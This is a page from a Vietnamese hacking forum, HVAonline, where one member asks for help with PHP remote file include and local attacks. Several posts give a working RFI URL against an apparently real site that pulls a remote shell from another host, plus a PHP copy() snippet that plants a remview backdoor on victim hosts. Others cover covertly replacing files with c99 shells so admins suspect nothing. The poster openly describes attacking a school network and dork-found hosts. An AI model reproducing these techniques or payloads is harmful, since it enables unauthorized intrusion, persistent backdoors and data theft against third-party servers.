| |
|
|
venom wrote:
rất chi tiết
chi tiết như bài nguyên thuỷ của anh Vennom a' , em nhớ anh Vennom đã viết bài này trong HVA trước đây và được rất nhiều người chú ý mà ! 
|
 |
|
|
thelast wrote:
Designed: Le Nhat Nam - Security checked: xLuke & Hacked by quocboy 
cái code source forum nhạc đó là của sweetlove , code của thằng bạn tri kỉ của em , thế mà lê nhật nam là ai mà đưa cái bản quyền vào ac' thiệt
|
|
|
|
dabu wrote:
Cấu hình mạng của em như sau :
Modem (ADSL)|192.168.1.1|==|192.168.1.2|PC1(2000server)|10.0.0.5|===|10.0.0.4|PC2(server2003).
Em đã NAT từ modem ADSL vào PC1 theo cổng 80 làm Webserver trên PC1 thì ok .
Nhưng em muốn làm Webserver trên PC2 chạy 2003 .
Em đã thử NAT từ 192.168.1.2 sang 10.0.0.5 (NAT thông qua routing and Remote access )rồi nhưng vẫn không truy cập vào Webserver chạy trên 2003 được ?
Không biết em đã cấu hình sai chổ nào chăng ? mong mọi người góp ý.Thanks !
úi dà ... thế thì đâu cần NAT đâu hả bạn ? mình nghĩ cấu hình RIP thì đúng hơn , mục đích của bạn là 2 lớp mạng trên thấy nhau mà , vậy thì config routing remote access theo RIP đi !!! (làm tren cả 2 may PC1&PC2) .
|
|
|
|
|
dùng Radius cho wireless có bảo mât không anh ? , không thấy bài viết đề cập gì tới Radius cả !!!
|
|
|
|
theo anh dinhcaohack thì có thể dùng PHP viết 1 file upload và run trên host của mình để upload vào folder khác của host khác được không anh ?
em thử làm thế nhưng báo lỗi tè le khi upload với lý do này :
Code:
failed to open stream: HTTP wrapper does not support writeable connections. in /home/lonely/public_html/upload.php on line 9
và
Code:
Unable to move '/tmp/phppsAdcd' to 'http://nhu.hollosite.com/uploads/y.php' in /home/lonely/public_html/upload.php on line 9
==> y chang cái cách em copy theo kiểu hack local topic 
nếu có cao kiến cho đoạn code upload ,up file vào 1 host khác mong anh chỉ giúp !!!
|
|
|
|
Bigball_hacker wrote:
Hehe. Cho dùng avatar là một việc làm nguy hiểm nếu như forum không bảo mật tốt, hacker sẽ dùng chức năng upload avatar này mà up shell lên. Quá nguy hiểm
mình không nghĩ như vậy , vì khi up file lên người ta check file hết rồi ! avatar thì chỉ là những file .jpg,png,gif ..ect..ect , chứ up tùm lum lên thì loạn hết
|
|
|
|
|
mình nghĩ các lệnh trên chỉ làm trên win xp (user nhom adminstrators ) thôi , chứ trong domain win 2k3 thì ngủm !!!
|
|
|
|
kamxaki wrote:
em là newbie cực mới ....nên có những câu hỏi wá ngốc nghếch thì xin các bác bỏ wa và giúp dzìum nhé !
câu hỏi của em là Ms DOS hình như trong win xp sp2 ko có nhỉ !!! nếu muốn có thể sử dụng bằng cách nào ? sử dụng trong khi nối mạng à ?
bạn vào start==>run==>cmd , tất nhiên là phải có mạng bạn mới thực tập được chứ , nhưng nếu không có mạng thì bạn có thể cài card loopback và tập dượt trên 1 máy cũng được ( nhưng tất nhiên không được rõ ràng bằng thực hành trong mạng ) !
|
|
|
|
|
cảm ơn các anh về bài viết này , nhưng em nghĩ nó chỉ áp dụng cho mang lan không được config kĩ phải không ạ ? em có dùng thử 1 số lệnh trên để xâm nhập vào mạng trường ,nhưng win2k3 nó config ac' qua' nên chẳng làm gì đươc. rất mong các anh nói rõ hơn 1 mạng lan config policy như thế nào thì có thể dùng lệnh trên tránh bị hack và bỏ qua các bước gì thì bị các lênh trên hack ạ , rất mong các anh hướng dẫn giúp ! cảm ơn các anh nhiều .
|
|
|
|
Luke wrote:
Anh chỉ nghĩ là, trước khi nghiên cứu về hacking nên trang bị cho mình đầy đủ các kiến thức căn bản đi đã.
Anh nghĩ em nên học một ngôn ngữ lập trình cho chắc đã. Bởi vì khi em nắm chắc, trong trường hợp này là PHP. Em sẽ ko cần phải hỏi han nhiều.
Mà bây giờ hỏi han chưa chắc em đã nắm được bản chất của vấn đề.
Topic này viết về Local Attack thì cũng ko nên quá đi xa về RFI, nếu muốn mọi người có thể mở 1 topic ra. Tránh việc để cho các bài viết HVA trở nên lộn xộn.
Cảm ơn.
cảm ơn về ý kiến của anh , em cũng đã & đang tự học php qua ebook , nhưng chỉ ở mức thao tác với database và lấy 1 số thông tin phía người dùng , còn network em cũng đã hoc qua các course MCSA , với topic mà anh đưa ra em thấy rất thú vị đó chứ ! em đã thử dùng attack theo kiểu include ngay sau khi tham gia topic này nhưng chỉ áp dụng được cho 1 số host em tìm theo "plume CMS" ,nhưng không thực hiện được lênh shell ???, còn theo cách copy từ remview từ 1 host như các anh hướng dẫn ,em cũng đã thử nhưng cách này chưa thành công (em cũng dùng qua het r57,c99,remview nhưng không nhớ tên chỉ biết nó là backdoor ) ...qua topic này em muốn tìm hiểu rõ hơn rất mong các anh hướng dẫn nũa ạ
|
|
|
|
dinhcaohack wrote:
điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
Riêng cái chuyện nói tục chửi bậy là không đủ .. tư cách rồi nhóc ạ
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .!
Anh chưa thử xem video  , anh nghĩ chắc cái "plume CMS" dính lỗi include PHP, có thể em không thực hành được là vì bug ấy .. có lâu rồi em ạ, muốn thực hành thì tốt thôi .. cứ 0h30' em ghé qua milw0rm xem có bug PHP Remote Include thì thực hành :">
Còn cái "dùng "include " để hack" không phải như em nghĩ đâu , đây là cách nhúng shell vào 1 file PHP trên host victim , wa vờ nít đi em, anh ngại type bên này lắm
cảm ơn anh nhiều he'n , hồi đêm wa em cu~ng vào milw0rm , và dùng cai include đo'..đo' anh, em nhớ hình như là /exploits/1280 gì đó thì phải ...nhưng khi include rồi , em thưc hiện mấy cái lênh thì nó báo lỗi include(XXX) tùm lum cả , mà em cu~ng không hiểu cái file depend.php
nó viết cái gì cả , anh có thể chỉ giúp em không ạ ?
okis em thử wa vo*` nit  thưc ra em là stand_alone bên đó , thanks anh nhiều ...
|
|
|
|
gamma95 wrote:
Code:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit !
ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
các anh ơi ! cho em xin na`o , em cu~ng biết VNIIS rồi có điều ở đây là topic về Hacklocal mà anh , thưc ra forum na`o thi` cũng thế cả , kĩ thuật hack ở viêtnam cũng đều dùng tools, và kĩ thuật của các hacker nước ngoài cả , có điều kĩ thuật nó từ người này qua người khác và phát triển thêm .. ..rất mong các anh tận tình hướng dẫn a ! còn dùng hack làm gì thì em nghĩ cũng là do ý thức của mỗi người cả ! em không có ý gì khác , chỉ mong các anh đoàn kết xây dựng HVA ngày càng mạnh .
|
|
|
|
dinhcaohack wrote:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)
anh dinhcaohack ơi ! hồi wa em coi cái film demo của may thằng cha kia nó demo , thì thấy dùng hàm include thì chỉ có thể attack mấy cái host free dỏm hay sao a' Code:
http://bacaplume.free.fr/manager/frontinc/prepend.php?_PX_config[manager_path]=http://nhuy.hollosite.com/mshell.txt?
trang đó có mấy thằng turkey nó hack trước rồi , em cũng search theo từ khóa trong film "powered by plume CMS" nhưng không fải host nào cu~ng vô được !!! lâu lâu mới có cái được thôi a' , không biết "plume CMS" là 1 loai forum hay host của công ty nào đó cho thuê ??? theo kinh nghiệm của anh dinhcaohack thì cach dùng "include " để hack những host , huac forum bị lỗi thế nào hả anh ? cảm ơn anh nhiều nhiều lắ'm rất mong nhận được trả lời của anh .
|
|
|
|
gamma95 wrote:
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế
Anh gamma ơi cho em hỏi , em viết hàm copy như anh nói để thử practise trong host của em , em cấp permission write public rồi mà nó còn báo lỗi thế này :
Code:
Warning:copy(http://freewebtown.com/tang05/fileremview)[function.copy]:failed to open stream:HTTP wrapper does not support writeable connections in /home/lonely/public_html/attacky.php on line 15
-em dùng 3 host cho mô hình này , 1 host không support chứa remview , host A chứa file attacky.php(em run bị lỗi trên), host B là destination , em dùng copy remview về 1 file php( em config write public ) ==> nhưng có lỗi như trên , mong anh chỉ giúp , cảm ơn anh nhiều !!!
|
|
|
|
rất ...rất cảm ơn anh Dinhcaohack nhiều , em đã thử dùng c99 để hack thử forum kia chư`ng hơn 1 tháng rồi , nhưng cứ tưởng phải up vô host mới practise đuợc, nhờ anh bi giờ mới biết , quả thiệt trời cao
|
|
|
|
Luke wrote:
ato wrote:
Có thể dùng con này để connect vao DB,nhỏ gọn hơn là wget toàn bộ phpmysql sang http://rapidshare.de/files/24153994/mysql.php.html
Nói gì thì nói chứ dùng phpMyAdmin vẫn sướng nhất, mà install bằng shell command, có mất thời gian đâu.
Còn nếu dùng 1 file thì Luke khuyên dùng r57 và c99 shell
Ưu điểm của r57 là hack theo kiểu RFI rất sướng, ko cần upload ^_^
Tuy nhiên nếu tìm được weak chmod dir thì tương c99 mạnh hơn. Nhất là cái mysql function của nó. kết hợp cả 2 là tuyệt vời nhất
Để Luke up demo lên cho mọi người.
Đây cũng là một đoạn phim hacking demo rất đáng xem về kỹ thuật tấn công local, chỉ tiếc là nó dùng tiếng (*@&^@#&*^@
http://67.15.40.2/~tranphu/files/r57.rar
Mọi người xem thế nào nhé
anh Luke ơi cho em hỏi làm sao ma` khôg cần upload con r57 huặc c99 lên host mà vẫn có thể run nó đươc hén ?anh có thể nó rõ hơn được không ạ , cảm ơn anh nhiều .
|
|
|
|
|
mấy anh cho em hoải bài viết dùng lệnh để xâm nhập máy tính na`y, áp dụng cho OS gì vậy ? và hình cái nài áp dụng only LAN phải không các huynh ?
|
|
|
|
|
em đọc đoạn code exploite na`y , em vẫn chưa hiểu gì cả nhờ anh conmale nói kĩ về bug của loại forum này được không ạ ? cảm ơn anh nhiều.
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
